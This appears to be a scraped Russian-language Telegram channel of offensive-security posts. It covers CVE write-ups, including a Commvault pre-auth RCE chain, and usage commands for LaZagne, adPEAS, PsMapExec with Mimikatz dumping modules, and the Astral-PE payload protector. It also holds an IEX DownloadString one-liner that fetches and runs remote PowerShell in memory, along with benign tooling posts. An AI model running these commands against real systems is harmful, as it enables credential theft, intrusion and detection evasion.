Whitehat Lab
1.88K subscribers
333 photos
381 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🎩 How I Used AI to Create a Working Exploit for CVE-2025-32433

Исследование о нашумевшей уязвимости в SSH реализации от Erlang/(OTP) которой присвоили оценку по CVSS - 10.0

😉 Research
😹 PoC

#research #cve #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥1
🔄🔺 Dalfox 2.11.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

UPD. 2.11

Установка:

go install github.com/hahwul/dalfox/v2@latest


Пример:

dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url


💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Offensive Xwitter
😈 [ hasherezade @hasherezade ]

Centralized resource for listing and organizing known injection techniques and POCs:

🔗 https://github.com/itaymigdal/awesome-injection

🐥 [ tweet ][ quote ]
👍3
🔄✖️ Astral-PE v1.6.0.0

Протектор для 💻 Windows PE файлов
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export

⚙️ Использование:

./Astral-PE.exe payload.exe -o payload_clean.exe


😹 Home
😹 Download

#astralpe #mutator

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
🔄 📞 The LaZagne Project v2.4.7

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

UPD. Автор добавил поддержку Яндекс браузера

📌 Список поддерживаемого ПО

Примеры использования
:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😁221
🖼️ minikube v1.35.0

Локальный Kubernetes в Linux, Windows и MacOS

Фичи:

▪️ LoadBalancer
▪️ Multi-cluster
▪️ NodePorts
▪️ Persistent Volumes
▪️ Ingress


Установка в Linux:

curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube_latest_amd64.deb
sudo dpkg -i minikube_latest_amd64.deb


Основные команды:

minikube start
minikube dashboard
kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0
kubectl expose deployment hello-minikube --type=NodePort --port=8080
minikube service hello-minikube
minikube start --kubernetes-version=latest
minikube stop
minikube delete
minikube delete --all


😹 Home
😉 Docs

#kubernetes #minikube #devops

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤷11
⚙️ CVE-2025-21204 - Windows Update Stack LPE

Повышение привилегий (LPE) в 💻 Windows системах. После установки штатных апдейтов у некоторых пользователей появилась директория C:\inetpub, обычно используется в рамках работы веб-сервера IIS, у меня например появилась. Это если что такой фикс от микрософт 😁 и удалять ее не стоит.

😉 Research
😉 PoC

#windows #lpe #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1
🎩 🗂 Доклады с конференции Black Hat Asia 2025

⌨️

DriveThru Car Hacking Fast Food, Faster Data Breach
KernJC Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
vCenter Lost How the DCERPC Vulnerabilities Changed the Fate of ESXi
etc.


😹 Home
😹 Download

#pentest #blackhat #blackhatasia

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍1
😁9🤔2
Виноваты безопасники ?
Anonymous Poll
23%
Да
28%
Нет
48%
Я безопасник 😅
🤝122
🔄 🏃 adPEAS v0.8.27

Отличный инструмент для поиска и сбора информации в 🏠 Active Directory

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

UPD. Добавили поддержку модуля для Bloodhound CE

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS


Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'


Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred


Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All


💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥22👍1
😁15👍2🔥1🫡1
💻 Windows sudo v1.0.1

Новый инструмент в 💻 Windows 11 (24H2 и новее), позволяющий выполнять команды с правами администратора

Включение:

Параметры > Система > Для разработчиков > Включить sudo


Поддерживает 3 режима работы:

--new-window - в новом окне

--inline - в текущем окне

--disable-input - в текущем окне с отключенным вводом в целевое приложение


По умолчанию работает в режиме нового окна, изменить значение:

# forceNewWindow, disableInput, normal
sudo config --enable normal

sudo netstat -ab


Есть принципиальные отличия от runas:

sudo работает только с правами администратора и использует UAC для подтверждения
sudo не поддерживает выполнение команд от имени других пользователей
sudo может выполняться в текущем сеансе консоли (в зависимости от режима), тогда как runas всегда запускает новый процесс


Банальная унификация, sudo app.exe гораздо привычнее чем runas /user:Администратор "C:\path\app.exe"

Почему я об этом решил написать ? Все таки, это стандартная утилита с довольно интересным и опасным функционалом и я уверен что, мы слышим о ней далеко не в последний раз 😅

UPD. Ключи реестра:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 0 /f


😉 Sudo for Windows
💻 Github

#windows #sudo

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁61
⚙️ CVE-2025-34028 - Commvault Pre-Authenticated RCE

Path traversal уязвимость приводящая к выполнению произвольного кода (RCE) без аутентификации

▪️Отправляется HTTP-запрос на /commandcenter/deloyWebpackage.do, в результате чего Commvault получит ZIP-файл с внешнего сервера
▪️Содержимое архива разгружается во временный каталог
▪️Параметр ServicePack для path traversal в предварительно аутентифицированный каталог на сервере, например ../../Reports/MetricsUpload/shell
▪️SSRF через /commandcenter/deployWebpackage.do
▪️RCE через /reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jsp

Рейтинг CVSS - 9.0

Уязвимость устранена в версии 11.38

➡️ Research
➡️ Vendor
💻 PoC

#cve #rce #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
21
🖥️ LLMs.txt generator v2

Генератор .txt файлов для обучения LLM

Можно добавить llmstxt.new перед любым URL, например - https://www.llmstxt.new/https://szybnev.cc

Есть API:

# Start LLMs.txt generation
curl -X POST "https://api.firecrawl.dev/v1/llmstxt" \
-H "Authorization: Bearer your_api_key" \
-H "Content-Type: application/json" \
-d '{
"url": "https://example.com",
"maxUrls": 2,
"showFullText": true
}'

# Check generation status
curl -X GET "https://api.firecrawl.dev/v1/llmstxt/job_id" \
-H "Authorization: Bearer your_api_key"


from firecrawl import FirecrawlApp

# Initialize the client
firecrawl = FirecrawlApp(api_key="your_api_key")

# Generate LLMs.txt with polling
results = firecrawl.generate_llms_text(
url="https://example.com",
max_urls=2,
show_full_text=True
)

# Access generation results
if results.success:
print(f"Status: {results.status}")
print(f"Generated Data: {results.data}")
else:
print(f"Error: {results.error}")


😉 LLMstxt
📔 Docs

#llm

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Toffy @toffyrak ]

I have just released my first tool: GPOHound 🚀

GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.

Check it out here:
🔗 https://github.com/cogiceo/GPOHound

🐥 [ tweet ]
1
🔄 💻 PsMapExec v0.7.5

Отличный инструмент для пост эксплуатации в 💻 Active Directory, написанный на PowerShell.

UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF

Текущая поддержка методов (протоколов):

🔵RDP
🔵SessionHunter
🔵SMB
🔵SMB Signing
🔵Spraying
🔵VNC
🔵WinRM
🔵WMI
🔵MSSQL
🔵Kerberoast


Реализованные модули:

🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов
🔵 ConsoleHistory - история в PowerShell
🔵 Files - файлы в типичных директориях
🔵 KerbDump - дамп Kerberos билетов
🔵 eKeys - дамп ключей (Mimikatz)
🔵 LogonPasswords - дамп logon passwords (Mimikatz)
🔵 LSA - дамп LSA (Mimikatz)
🔵 NTDS - реализация DCsync
🔵 SAM - дамп SAM


Запуск из памяти:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")


Примеры:

# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]


😹 Github
📔 Documentation

#soft #pentest #powershell #psmapexec #redteam #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍221
🖥 uv v0.6.16

Все еще используете pip ? Тогда мы идем к вам!

Для себя, относительно недавно открыл сей прекрасный инструмент, пользоваться pipx и уже тем более pip более не предоставляется возможным 😅

Что же это такое ?

Это современный, сверхбыстрый менеджер пакетов и проектов для 🐍 Python, написанный на 🖼️ Rust. Он призван заменить почти все привычные инструменты: pip, pipx, poetry, pyenv, twine, virtualenv и даже менеджеры версий Python.

Кто будет писать в лс с вопросами и там будет, что-то вроде pip install ... буду бить по рукам 😂 направлять сюда

Установка в 🐧 Linux:

curl -LsSf https://astral.sh/uv/install.sh | sh


Установка в 💻 Windows:

powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"


Хотел было написать подробную заметку, но нашел уже готовую статью

📝 Быстрый старт в мир Python окружений с uv
💻 Home
📔 Docs

#python #uvx #venv

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
21👍1🔥1😱1